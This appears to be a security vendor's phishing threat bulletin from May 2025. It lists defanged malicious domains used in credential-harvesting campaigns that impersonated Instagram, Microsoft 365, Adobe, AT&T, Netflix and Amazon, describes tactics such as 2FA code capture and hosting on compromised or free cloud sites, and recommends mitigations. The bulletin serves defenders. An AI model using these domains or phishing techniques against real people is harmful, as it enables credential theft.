Phish Wire - May 27 2025

A significant increase in advanced zero-day phishing campaigns was noticed in mid-May 2025, targeting various services, including social media, e-commerce, corporate email, telecommunications, and streaming platforms. Attackers exploited legitimate cloud services and compromised infrastructure—from professional learning platforms to web hosting and cloud app environments—to give credibility to their phishing pages. Below are some examples and highlights.

• manage[.]nay[.]qxk[.]mybluehost[.]me

• googleiinfluencerhub[.]ct[.]ws

• czoin[.]dzdyf[.]es

• newspaceitenow[.]tech/Gran1/

• sign[.]account[.]srver[.]at[.]bel[.]0auth[.]165-154-199-230[.]cprapid[.]com

• my-php-app-production-7f57[.]up[.]railway[.]app

• log-in[.]billing-information[.]netflix-id[.]cc[.]valterjavaroni[.]com[.]br

• greatbtinternet[.]in/vparty/

Google Influencer

A Texas user clicked on this Instagram phishing attack on May 11 on their work device, where threat actors created a fake “Google Influencer Hub” webpage to target Instagram users’ login credentials.

In this instance, the phishing email was sent by the personal Gmail account of the staff member’s spouse, who had been compromised. The phishing email contained a link to a password protected The scam likely deceived users by promising a Google-sponsored influencer program, tricking them into providing their Instagram credentials. After the credentials are entered, the site’s script captures them and submits the username and password to the attacker’s server. Such messages are often communicated through the Instagram app, bypassing corporate email security.

The attack also includes a 2FA prompt stage, which asks the user for a 6-digit code after they enter their password.

Office 365 and Okta Spearphish

In late May, a Kentucky employee clicked on the Microsoft spearphish below.

This attack targeted Microsoft Office 365 credentials, using a phishing page hosted on czoin[.]dzdyf[.]es (a Spanish domain). Additionally, the HTML suggests that the phishing kit appears to integrate elements of Okta, as seen by references to Okta in the HTML code.

“Adobe Document Cloud” Spearphish

In mid-May, a staff member at an Idaho organization clicked on a phishing attack disguised as an "Adobe Document Cloud" document.

The original phishing page presented an Adobe Document Viewer, prompting the user to select their email type (Outlook, in this case). The attack contains the assurance, “We’ll never share your email with anyone else.”

The phishing kit behind this page catered to several email providers, including Outlook, Yahoo, AOL, Office 365, and “Other Mail” options.

A similar phishing kit to the one on newspaceitenow.tech was observed on greatbtinternet[.]in/vparty/ a week later, on May 21, targeting a user in Kentucky.

AT&T Wireless Login Phish on cPanel Site

On May 13th, an Idaho employee clicked on the AT&T phishing attack below on their work device.

Attacks targeting AT&T customers are often conducted through SMS messages that mimic AT&T's regular communications, including service updates and marketing promotions. When AT&T accounts are compromised, hackers can access important information related to devices and billing. This access allows them to manage SIM cards and eSIMs, potentially enabling them to perform SIM swaps.

Microsoft Spearphish on the Railway Cloud App

On May 15th, a user at a Minnesota organization clicked the Microsoft spearphish below.

This attack was hosted on the Railway.app cloud platform, which provides free hosting for web applications. By deploying on Railway.app, the attacker took advantage of a legitimate cloud domain (up.railway.app). The text on this phishing page reads: “Because you’re accessing sensitive info, you need to verify your password,” which is similar to Microsoft's language in real scenarios, such as reconfirming credentials for sensitive account changes.

Netflix Billing Phish via Compromised Brazilian Site

On May 21, an employee at an organization in Colorado clicked on a phishing email related to Netflix billing.

The attack is hosted on a legitimate domain of a legitimate Brazilian business, which was likely compromised and is unwittingly hosting this phishing attack. Leveraging the reputation of a reputable third-party domain, this attack can easily go undetected.

Amazon Phish on Spoofed Hosting

On May 18th, another Texas staff member clicked on the Amazon phishing attack below on their work device.

The domain mybluehost[.]me likely impersonated the legitimate hosting domain bluehost.com. Examples like this highlight the risks associated with users accessing personal email accounts on work devices.

Mitigations 

• Block designated domains on corporate firewalls and endpoint security solutions.

• Educate users about the risks of phishing in file-sharing applications outside of email, such as Adobe.

• Remind users of phishing risks associated with their personal accounts, even when accessed on corporate devices.

• Enforce multi-factor authentication (MFA) for all corporate logins to minimize the risk of credential compromise.